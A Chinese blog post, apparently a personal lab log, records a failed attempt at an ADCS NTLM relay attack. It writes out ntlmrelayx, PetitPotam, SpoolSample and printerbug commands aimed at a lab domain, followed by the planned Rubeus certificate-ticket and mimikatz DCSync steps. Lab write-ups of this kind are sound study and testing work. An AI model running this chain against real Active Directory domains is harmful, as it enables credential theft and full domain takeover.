2. 程式人生 > 其它 >ADCS relay攻擊(失敗)

ADCS relay攻擊(失敗)

阿新 發佈:2022-04-04

先說說我的環境

攻擊機 192.168.149.139 Kali
DC主機 192.168.149.211    win2012 R2
AD CS   192.168.149.213     win2008 R2

可能是ADCS伺服器不能用win08的吧

 

 

 先用攻擊機簡單試探一下,看看curl能不能ok,curl 192.168.149.213/certsrv/ -I,然後看看我們的證書,certutil -config - -ping

 

 

 環境簡單測試沒有問題,現在開始切入正題,始終抓不到,媽的

python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController

ADCS執行

PetitPotam.exe 192.168.149.139 192.168.149.211 1

 

攻擊成功,然而並沒有彈過來,淦

 

 

python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs 

kali執行

python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController

ADCS執行

 

 

 

SpoolSample.exe 192.168.149.211 192.168.149.139

kali執行

python3 printerbug.py leecinsy/administrator:[email protected] 192.168.149.139

失敗

 

 python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs

ADCS執行

PetitPotam.exe 192.168.149.139 192.168.149.211 1

失敗

那就先假裝我抓到了,後續的步驟是

Rubeus.exe asktgt /outfile:kirbi /user:DC機器名 /ptt /certificate:<Base64> 

lsadump::dcsync /domain:leecinsy.com /all /csv      //dcsync攻擊

 

後續

可能太菜了,最主要是要清楚攻擊的流程和步驟

 

相關推薦

ADCS relay攻擊失敗

先說說我的環境 攻擊機 192.168.149.139 KaliDC主機192.168.149.211    win2012 R2AD CS   192.168.149.213     win2008 R2

intel:spectre&Meltdown側通道攻擊—— DRAM address mapping

  前面介紹了row hammer,理論上很完美,實際操作的時候會面臨很尷尬的問題:記憶體儲存資料最小的單位是cell就是個電容,充電是1,放電是0,無數個橫著的cell組成row,無數個豎著的cell組成colume;數個row和

Dos拒絕服務Syn-Flood泛洪攻擊--Smurf 攻擊

Dos拒絕服務利用程式漏洞或一對一資源耗盡的Denial of Service 拒絕服務DDos 分散式拒絕服務多對一

認證重放攻擊高風險

認證重放攻擊(高風險 風險級別: 高風險 風險描述: 攻擊者傳送一個目標主機已經接收的資料包,特別是在認證過程中,用於認證使用者身份時; 風險分析: 攻擊者可以使用重放攻擊方式偽裝成使用者,冒充使

中間人攻擊ARPspoof實操

中間人攻擊(ARPspoof 1.介紹: 中間人攻擊(Man-in-the-MiddleAttack,簡稱“MITM攻擊是一種“間接”的入侵攻擊,這種攻擊模式是通過各種技術手段將受入侵者控制的一臺計算機虛擬放置在網路連線中的兩臺通訊計

力扣495java-提莫攻擊簡單

題目: 在《英雄聯盟》的世界中,有一個叫 “提莫” 的英雄,他的攻擊可以讓敵方英雄艾希編者注:寒冰射手進入中毒狀態。現在,給出提莫對艾希的攻擊時間序列和提莫攻擊的中毒持續時間,你需要輸出艾希的中毒狀

Android許可權攻擊

Android許可權檢查機制     程式想要執行任何的特定操作,必須先申請許可權,申請方法只需要在程式的AndroidManifest.xml中新增相應的許可權程式碼即可。比如,在程式中使用發簡訊的功能,需新增:

LeetCode——495. 提莫攻擊Java

題目描述 題幹: 在《英雄聯盟》的世界中,有一個叫 “提莫” 的英雄。他的攻擊可以讓敵方英雄艾希編者注:寒冰射手進入中毒狀態。

Win10登入提示gpsvc服務登入失敗,不支援通用唯一識別符號UUID型別怎麼辦

許多使用者在登入win10系統的時候,提示gpsvc服務登入失敗,不支援通用唯一識別符號UUID型別,導致登入系統失敗,該怎麼辦呢,本文就給大家講解一下具體的解決步驟。

Web安全之SQL注入攻擊技巧與防範

add by zhj: 作者總結了防止SQL的幾種辦法,終極辦法是資料庫如MySQL自身提供的預編譯功能,即先將SQL語句中的引數用?替換,發給資料庫進行預編譯,得到編譯結果後再傳入引數替換?,執行SQL。

Cento7 將每小時SSH暴力破解登陸失敗超過10次的ip加入系統黑名單----系統安全篇

要理解這段指令碼首先要先熟練的掌握awk的知識 在正式實踐前需要理清楚幾個知識點:

嘗試在部落格園上新增洛天依live2d看板娘失敗半成品

參考了@unsignedzhang的文章:http://unsignedzhang.cn/luotianyi-live2d/ 嘗試把資原始檔放到github上,通過release的方式放到CDN上,但是放到部落格園上總是無法顯示模型

HTTP慢速拒絕服務攻擊Slow HTTP Dos

HTTP慢速拒絕服務攻擊簡介 HTTP慢速攻擊是利用HTTP合法機制,以極低的速度往伺服器傳送HTTP請求,儘量長時間保持連線,不釋放,若是達到了Web Server對於併發連線數的上限,同時惡意佔用的連線沒有被釋放,那麼伺服器

為防止maven匯出資源xml失敗

<build> <resources> <resource> <directory>src/main/resources</directory> <includes>

解Bug之路-記一次呼叫外網服務概率性失敗問題的排查轉發

原文:https://www.cnblogs.com/alchemystar/p/13444964.html 解Bug之路-記一次呼叫外網服務概率性失敗問題的排查

python介面自動化二十八 requests超時重試方法由於連線方在一段時間後沒有正確答覆或連線的主機沒有反應,連線嘗試失敗

前言 “由於連線方在一段時間後沒有正確答覆或連線的主機沒有反應,連線嘗試失敗”,這是經常遇到的問題requests.exceptions.ConnectionError: HTTPSConnectionPool(host=\'www.github.com\', port=443):

unittest框架系列三跳過測試和預期失敗

跳過測試和預期失敗 歡迎加入測試交流群:夜行者自動化測試816489363進行交流學習QAQ

ZeroLogon(CVE-2020-1472) 漏洞的攻擊與防禦策略

上文我們介紹了攻擊原理,本文我們將詳細介紹可以發起的攻擊種類和防禦措施。

UE4學習日記更加精確的攻擊檢測

前面做的攻擊檢測太過粗糙,直接使用一個巨大的檢測框進行檢測,導致很多時候武器還沒揮出去,怪物就已經受傷了。 現在我們來做更加精確的攻擊檢測。其思路就是通過在攻擊的過程中,不斷的生成小一些的攻擊

OSPF中的frame-relay1

使用路由器做為幀中繼交換機,配置如下: hostname frswframe-relay switching!interface Serial1/0no ip addressencapsulation frame-relay IETFserial restart-delay 0clock rate 64000frame-relay lm